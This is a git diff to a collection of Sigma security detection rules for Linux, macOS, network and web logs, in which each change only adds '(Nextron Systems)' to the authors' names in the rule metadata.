 description: Detects suspicious interactive bash as a parent to rather uncommon child processes
 references:
     - Internal Research
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/14
 logsource:
     product: linux
diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml b/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml
index cad388738..8f781dbf0 100644
--- a/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects java process spawning suspicious children
 references:
     - https://www.tecmint.com/different-types-of-linux-shells/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/03
 tags:
     - attack.execution
diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml b/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml
index 0d2659fad..37e6ac007 100644
--- a/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell
 references:
     - Internal Research
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/14
 modified: 2022/07/26
 tags:
diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml b/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml
index 7eeba5399..379b3d484 100644
--- a/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects events with patterns found in commands used for reconnaissance on linux systems
 references:
     - https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/06/20
 tags:
     - attack.reconnaissance
diff --git a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml
index 8c915ef5a..93d7784f0 100644
--- a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges
 references:
     - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/05
 tags:
     - attack.defense_evasion
diff --git a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml
index d3d5d5d36..34e607776 100644
--- a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script
 references:
     - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/05
 tags:
     - attack.defense_evasion
diff --git a/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml b/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml
index 2b5b8a17a..d4da8acbc 100644
--- a/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml
@@ -5,7 +5,7 @@ description: Detects suspicious sub processes of web server processes
 references:
     - https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/
     - https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF
-author: Florian Roth, Nasreddine Bencherchali (update)
+author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
 date: 2021/10/15
 modified: 2022/12/28
 tags:
diff --git a/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml b/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml
index 577d2f585..6ca0e5c26 100644
--- a/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml
+++ b/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml
@@ -5,7 +5,7 @@ description: Detects passwords dumps from Keychain
 references:
     - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md
     - https://gist.github.com/Capybara/6228955
-author: Tim Ismilyaev, oscd.community, Florian Roth
+author: Tim Ismilyaev, oscd.community, Florian Roth (Nextron Systems)
 date: 2020/10/19
 modified: 2021/11/27
 tags:
diff --git a/rules/macos/process_creation/proc_creation_macos_susp_find_execution.yml b/rules/macos/process_creation/proc_creation_macos_susp_find_execution.yml
index 4e415872e..9d94cc951 100644
--- a/rules/macos/process_creation/proc_creation_macos_susp_find_execution.yml
+++ b/rules/macos/process_creation/proc_creation_macos_susp_find_execution.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects usage of "find" binary in a suspicious manner to perform discovery
 references:
     - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/28
 tags:
     - attack.discovery
diff --git a/rules/network/dns/net_dns_external_service_interaction_domains.yml b/rules/network/dns/net_dns_external_service_interaction_domains.yml
index c35b22647..6c05ec273 100644
--- a/rules/network/dns/net_dns_external_service_interaction_domains.yml
+++ b/rules/network/dns/net_dns_external_service_interaction_domains.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE
 references:
     - https://twitter.com/breakersall/status/1533493587828260866
-author: Florian Roth, Matt Kelly (list of domains)
+author: Florian Roth (Nextron Systems), Matt Kelly (list of domains)
 date: 2022/06/07
 tags:
     - attack.initial_access
diff --git a/rules/network/dns/net_dns_mal_cobaltstrike.yml b/rules/network/dns/net_dns_mal_cobaltstrike.yml
index 09545969f..e88298a07 100644
--- a/rules/network/dns/net_dns_mal_cobaltstrike.yml
+++ b/rules/network/dns/net_dns_mal_cobaltstrike.yml
@@ -5,7 +5,7 @@ description: Detects suspicious DNS queries known from Cobalt Strike beacons
 references:
     - https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns
     - https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/05/10
 modified: 2022/10/09
 tags:
diff --git a/rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml b/rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml
index a3cc98312..97e90addc 100644
--- a/rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml
+++ b/rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml
@@ -4,7 +4,7 @@ status: stable
 description: Detects suspicious DNS queries to Monero mining pools
 references:
     - https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/10/24
 tags:
     - attack.impact
diff --git a/rules/network/dns/net_dns_susp_b64_queries.yml b/rules/network/dns/net_dns_susp_b64_queries.yml
index 8d929173e..3ef23ee85 100644
--- a/rules/network/dns/net_dns_susp_b64_queries.yml
+++ b/rules/network/dns/net_dns_susp_b64_queries.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious DNS queries using base64 encoding
 references:
     - https://github.com/krmaxwell/dns-exfiltration
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/05/10
 modified: 2022/10/09
 tags:
diff --git a/rules/network/dns/net_dns_susp_telegram_api.yml b/rules/network/dns/net_dns_susp_telegram_api.yml
index 46d88cedb..fa940cc92 100644
--- a/rules/network/dns/net_dns_susp_telegram_api.yml
+++ b/rules/network/dns/net_dns_susp_telegram_api.yml
@@ -7,7 +7,7 @@ references:
     - https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/
     - https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/
     - https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/06/05
 modified: 2022/10/09
 tags:
diff --git a/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml b/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml
index 1d67119c2..16eb048d4 100755
--- a/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml
+++ b/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml
@@ -5,7 +5,7 @@ description: Detects communication to C2 servers mentioned in the operational no
 references:
     - https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation
     - https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/04/15
 modified: 2021/11/27
 tags:
diff --git a/rules/web/product/apache/web_apache_segfault.yml b/rules/web/product/apache/web_apache_segfault.yml
index 75c2f1c43..f008794cf 100644
--- a/rules/web/product/apache/web_apache_segfault.yml
+++ b/rules/web/product/apache/web_apache_segfault.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a segmentation fault error message caused by a creashing apache worker process
 references:
     - http://www.securityfocus.com/infocus/1633
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/02/28
 modified: 2021/11/27
 tags:
diff --git a/rules/web/product/apache/web_apache_threading_error.yml b/rules/web/product/apache/web_apache_threading_error.yml
index 8aa2af739..f13feedd5 100644
--- a/rules/web/product/apache/web_apache_threading_error.yml
+++ b/rules/web/product/apache/web_apache_threading_error.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects an issue in apache logs that reports threading related errors
 references:
     - https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/01/22
 modified: 2021/11/27
 logsource:
diff --git a/rules/web/product/modsecurity/modsec_mulitple_blocks.yml b/rules/web/product/modsecurity/modsec_mulitple_blocks.yml
index f98254afd..4d749bbdf 100644
--- a/rules/web/product/modsecurity/modsec_mulitple_blocks.yml
+++ b/rules/web/product/modsecurity/modsec_mulitple_blocks.yml
@@ -2,7 +2,7 @@ title: Multiple Modsecurity Blocks
 id: a06eea10-d932-4aa6-8ba9-186df72c8d23
 status: stable
 description: Detects multiple blocks by the mod_security module (Web Application Firewall)
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/02/28
 modified: 2023/01/07
 tags:
diff --git a/rules/web/proxy_generic/proxy_apt_domestic_kitten.yml b/rules/web/proxy_generic/proxy_apt_domestic_kitten.yml
index 549358371..bc1f21d0f 100644
--- a/rules/web/proxy_generic/proxy_apt_domestic_kitten.yml
+++ b/rules/web/proxy_generic/proxy_apt_domestic_kitten.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group
 references:
     - https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/02/08
 modified: 2022/10/09
 tags:
diff --git a/rules/web/proxy_generic/proxy_baby_shark.yml b/rules/web/proxy_generic/proxy_baby_shark.yml
index 1774396fc..44c35b705 100644
--- a/rules/web/proxy_generic/proxy_baby_shark.yml
+++ b/rules/web/proxy_generic/proxy_baby_shark.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects Baby Shark C2 Framework communication patterns
 references:
     - https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/06/09
 modified: 2022/08/15
 tags:
diff --git a/rules/web/proxy_generic/proxy_chafer_malware.yml b/rules/web/proxy_generic/proxy_chafer_malware.yml
index 92c0529ef..4ad291c00 100644
--- a/rules/web/proxy_generic/proxy_chafer_malware.yml
+++ b/rules/web/proxy_generic/proxy_chafer_malware.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects HTTP requests used by Chafer malware
 references:
     - https://securelist.com/chafer-used-remexi-malware/89538/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/01/31
 modified: 2022/08/15
 tags:
diff --git a/rules/web/proxy_generic/proxy_cobalt_malformed_uas.yml b/rules/web/proxy_generic/proxy_cobalt_malformed_uas.yml
index 65e1d0be5..809a3fccb 100644
--- a/rules/web/proxy_generic/proxy_cobalt_malformed_uas.yml
+++ b/rules/web/proxy_generic/proxy_cobalt_malformed_uas.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike
 references:
     - https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/05/06
 modified: 2022/12/25
 tags:
diff --git a/rules/web/proxy_generic/proxy_download_susp_dyndns.yml b/rules/web/proxy_generic/proxy_download_susp_dyndns.yml
index 0350a70f0..18d6d21cb 100644
--- a/rules/web/proxy_generic/proxy_download_susp_dyndns.yml
+++ b/rules/web/proxy_generic/proxy_download_susp_dyndns.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects download of certain file types from hosts with dynamic DNS names (selected list)
 references:
     - https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/11/08
 modified: 2021/11/27
 tags:
diff --git a/rules/web/proxy_generic/proxy_download_susp_tlds_blacklist.yml b/rules/web/proxy_generic/proxy_download_susp_tlds_blacklist.yml
index 52fbc8dfc..4fd49897b 100644
--- a/rules/web/proxy_generic/proxy_download_susp_tlds_blacklist.yml
+++ b/rules/web/proxy_generic/proxy_download_susp_tlds_blacklist.yml
@@ -10,7 +10,7 @@ references:
 - https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf
 - https://www.spamhaus.org/statistics/tlds/
 - https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/11/07
 modified: 2023/01/09
 tags:
diff --git a/rules/web/proxy_generic/proxy_download_susp_tlds_whitelist.yml b/rules/web/proxy_generic/proxy_download_susp_tlds_whitelist.yml
index a8c9c043e..22396cac7 100644
--- a/rules/web/proxy_generic/proxy_download_susp_tlds_whitelist.yml
+++ b/rules/web/proxy_generic/proxy_download_susp_tlds_whitelist.yml
@@ -5,7 +5,7 @@ related:
 type: similar
 status: test
 description: Detects executable downloads from suspicious remote systems
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/13
 modified: 2023/01/09
 tags:
diff --git a/rules/web/proxy_generic/proxy_downloadcradle_webdav.yml b/rules/web/proxy_generic/proxy_downloadcradle_webdav.yml
index 3b483faaa..a299ca3ed 100644
--- a/rules/web/proxy_generic/proxy_downloadcradle_webdav.yml
+++ b/rules/web/proxy_generic/proxy_downloadcradle_webdav.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects WebDav DownloadCradle
 references:
 - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/04/06
 modified: 2021/11/27
 tags:
diff --git a/rules/web/proxy_generic/proxy_empire_ua_uri_combos.yml b/rules/web/proxy_generic/proxy_empire_ua_uri_combos.yml
index 9c025eeb3..c2cb077e0 100644
--- a/rules/web/proxy_generic/proxy_empire_ua_uri_combos.yml
+++ b/rules/web/proxy_generic/proxy_empire_ua_uri_combos.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects user agent and URI paths used by empire agents
 references:
 - https://github.com/BC-SECURITY/Empire
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/07/13
 modified: 2022/08/05
 tags:
diff --git a/rules/web/proxy_generic/proxy_empty_ua.yml b/rules/web/proxy_generic/proxy_empty_ua.yml
index 9d545ed49..031ec6969 100644
--- a/rules/web/proxy_generic/proxy_empty_ua.yml
+++ b/rules/web/proxy_generic/proxy_empty_ua.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious empty user agent strings in proxy logs
 references:
 - https://twitter.com/Carlos_Perez/status/883455096645931008
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/07/08
 modified: 2021/11/27
 tags:
diff --git a/rules/web/proxy_generic/proxy_exchange_owassrf_exploitation.yml b/rules/web/proxy_generic/proxy_exchange_owassrf_exploitation.yml
index 9a9b9c44e..6d858d7a5 100644
--- a/rules/web/proxy_generic/proxy_exchange_owassrf_exploitation.yml
+++ b/rules/web/proxy_generic/proxy_exchange_owassrf_exploitation.yml
@@ -5,7 +5,7 @@ description: Detects exploitation attempt of the OWASSRF variant targeting excha
 references:
 - https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/
 - https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/22
 tags:
 - attack.initial_access
diff --git a/rules/web/proxy_generic/proxy_exchange_owassrf_poc_exploitation.yml b/rules/web/proxy_generic/proxy_exchange_owassrf_poc_exploitation.yml
index 22a19f10b..bcd0eb70d 100644
--- a/rules/web/proxy_generic/proxy_exchange_owassrf_poc_exploitation.yml
+++ b/rules/web/proxy_generic/proxy_exchange_owassrf_poc_exploitation.yml
@@ -6,7 +6,7 @@ references:
 - https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/
 - https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/
 - https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/22
 tags:
 - attack.initial_access
diff --git a/rules/web/proxy_generic/proxy_ios_implant.yml b/rules/web/proxy_generic/proxy_ios_implant.yml
index f9d92f03b..fdfca9b93 100644
--- a/rules/web/proxy_generic/proxy_ios_implant.yml
+++ b/rules/web/proxy_generic/proxy_ios_implant.yml
@@ -5,7 +5,7 @@ description: Detects URL pattern used by iOS Implant
 references:
 - https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html
 - https://twitter.com/craiu/status/1167358457344925696
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/08/30
 modified: 2022/08/15
 tags:
diff --git a/rules/web/proxy_generic/proxy_powershell_ua.yml b/rules/web/proxy_generic/proxy_powershell_ua.yml
index 80527953e..07dbe1963 100644
--- a/rules/web/proxy_generic/proxy_powershell_ua.yml
+++ b/rules/web/proxy_generic/proxy_powershell_ua.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects Windows PowerShell Web Access
 references:
 - https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/13
 modified: 2021/11/27
 tags:
diff --git a/rules/web/proxy_generic/proxy_pwndrop.yml b/rules/web/proxy_generic/proxy_pwndrop.yml
index 24c64ff13..f7959832d 100644
--- a/rules/web/proxy_generic/proxy_pwndrop.yml
+++ b/rules/web/proxy_generic/proxy_pwndrop.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity
 references:
 - https://breakdev.org/pwndrop/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/04/15
 modified: 2021/11/27
 tags:
diff --git a/rules/web/proxy_generic/proxy_raw_paste_service_access.yml b/rules/web/proxy_generic/proxy_raw_paste_service_access.yml
index 34b8867dc..d484d1335 100644
--- a/rules/web/proxy_generic/proxy_raw_paste_service_access.yml
+++ b/rules/web/proxy_generic/proxy_raw_paste_service_access.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form
 references:
 - https://www.virustotal.com/gui/domain/paste.ee/relations
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/12/05
 modified: 2023/01/19
 tags:
diff --git a/rules/web/proxy_generic/proxy_susp_flash_download_loc.yml b/rules/web/proxy_generic/proxy_susp_flash_download_loc.yml
index 67cb9bdcc..5d3e43ddd 100644
--- a/rules/web/proxy_generic/proxy_susp_flash_download_loc.yml
+++ b/rules/web/proxy_generic/proxy_susp_flash_download_loc.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a flashplayer update from an unofficial location
 references:
 - https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/10/25
 modified: 2022/08/08
 tags:
diff --git a/rules/web/proxy_generic/proxy_telegram_api.yml b/rules/web/proxy_generic/proxy_telegram_api.yml
index 74d0aa2a5..da321603a 100644
--- a/rules/web/proxy_generic/proxy_telegram_api.yml
+++ b/rules/web/proxy_generic/proxy_telegram_api.yml
@@ -6,7 +6,7 @@ references:
 - https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/
 - https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/
 - https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/06/05
 modified: 2021/11/27
 tags:
diff --git a/rules/web/proxy_generic/proxy_turla_comrat.yml b/rules/web/proxy_generic/proxy_turla_comrat.yml
index 6e3a4a213..def96ce89 100644
--- a/rules/web/proxy_generic/proxy_turla_comrat.yml
+++ b/rules/web/proxy_generic/proxy_turla_comrat.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects Turla ComRAT patterns
 references:
 - https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/05/26
 modified: 2022/08/15
 tags:
diff --git a/rules/web/proxy_generic/proxy_ua_apt.yml b/rules/web/proxy_generic/proxy_ua_apt.yml
index 0cd2a8241..eb6a9272b 100644
--- a/rules/web/proxy_generic/proxy_ua_apt.yml
+++ b/rules/web/proxy_generic/proxy_ua_apt.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious user agent strings used in APT malware in proxy logs
 references:
 - Internal Research
-author: Florian Roth, Markus Neis
+author: Florian Roth (Nextron Systems), Markus Neis
 date: 2019/11/12
 modified: 2022/10/10
 tags:
diff --git a/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_ip.yml b/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_ip.yml
index bf7d55891..89aecc687 100644
--- a/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_ip.yml
+++ b/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_ip.yml
@@ -2,7 +2,7 @@ title: Bitsadmin to Uncommon IP Server Address
 id: 8ccd35a2-1c7c-468b-b568-ac6cdf80eec3
 status: experimental
 description: Detects Bitsadmin connections to IP addresses instead of FQDN names
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/06/10
 modified: 2022/08/24
 tags:
diff --git a/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml b/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml
index 35990eb17..63163d2c4 100644
--- a/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml
+++ b/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml
@@ -5,7 +5,7 @@ description: Detects Bitsadmin connections to domains with uncommon TLDs
 references:
 - https://twitter.com/jhencinski/status/1102695118455349248
 - https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/
-author: Florian Roth, Tim Shelton
+author: Florian Roth (Nextron Systems), Tim Shelton
 date: 2019/03/07
 modified: 2022/08/16
 tags:
diff --git a/rules/web/proxy_generic/proxy_ua_cryptominer.yml b/rules/web/proxy_generic/proxy_ua_cryptominer.yml
index b2a16149d..04e5d7eba 100644
--- a/rules/web/proxy_generic/proxy_ua_cryptominer.yml
+++ b/rules/web/proxy_generic/proxy_ua_cryptominer.yml
@@ -5,7 +5,7 @@ description: Detects suspicious user agent strings used by crypto miners in prox
 references:
 - https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65
 - https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/10/21
 modified: 2021/11/27
 tags:
diff --git a/rules/web/proxy_generic/proxy_ua_frameworks.yml b/rules/web/proxy_generic/proxy_ua_frameworks.yml
index ff1a600ed..e443432e9 100644
--- a/rules/web/proxy_generic/proxy_ua_frameworks.yml
+++ b/rules/web/proxy_generic/proxy_ua_frameworks.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs
 references:
 - https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/07/08
 modified: 2021/11/27
 tags:
diff --git a/rules/web/proxy_generic/proxy_ua_hacktool.yml b/rules/web/proxy_generic/proxy_ua_hacktool.yml
index fd89ac6b6..e28782298 100644
--- a/rules/web/proxy_generic/proxy_ua_hacktool.yml
+++ b/rules/web/proxy_generic/proxy_ua_hacktool.yml
@@ -5,7 +5,7 @@ description: Detects suspicious user agent strings user by hack tools in proxy l
 references:
 - https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb
 - http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/07/08
 modified: 2022/07/07
 tags:
diff --git a/rules/web/proxy_generic/proxy_ua_malware.yml b/rules/web/proxy_generic/proxy_ua_malware.yml
index 0ab4fe1ee..79641392e 100644
--- a/rules/web/proxy_generic/proxy_ua_malware.yml
+++ b/rules/web/proxy_generic/proxy_ua_malware.yml
@@ -9,7 +9,7 @@ references:
 - https://perishablepress.com/blacklist/ua-2013.txt
 - https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents
 - https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/07/08
 modified: 2023/01/22
 tags:
diff --git a/rules/web/proxy_generic/proxy_ua_susp.yml b/rules/web/proxy_generic/proxy_ua_susp.yml
index 0ee740b50..4888f415d 100644
--- a/rules/web/proxy_generic/proxy_ua_susp.yml
+++ b/rules/web/proxy_generic/proxy_ua_susp.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious malformed user agent strings in proxy logs
 references:
 - https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/07/08
 modified: 2022/10/31
 tags:
diff --git a/rules/web/proxy_generic/proxy_ua_susp_base64.yml b/rules/web/proxy_generic/proxy_ua_susp_base64.yml
index 1ed755ff8..5658bc112 100644
--- a/rules/web/proxy_generic/proxy_ua_susp_base64.yml
+++ b/rules/web/proxy_generic/proxy_ua_susp_base64.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious User Agent strings that end with an equal sign, which can be a sign of base64 encoded values used as User Agent string
 references:
 - https://blogs.jpcert.or.jp/en/2022/07/yamabot.html
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/07/08
 modified: 2022/11/27
 tags:
diff --git a/rules/web/webserver_generic/web_cve_2014_6287_hfs_rce.yml b/rules/web/webserver_generic/web_cve_2014_6287_hfs_rce.yml
index ac66a3cd2..7be0d5040 100644
--- a/rules/web/webserver_generic/web_cve_2014_6287_hfs_rce.yml
+++ b/rules/web/webserver_generic/web_cve_2014_6287_hfs_rce.yml
@@ -6,7 +6,7 @@ references:
 - https://vk9-sec.com/hfs-code-execution-cve-2014-6287/
 - https://www.exploit-db.com/exploits/39161
 - https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/19
 modified: 2023/01/02
 tags:
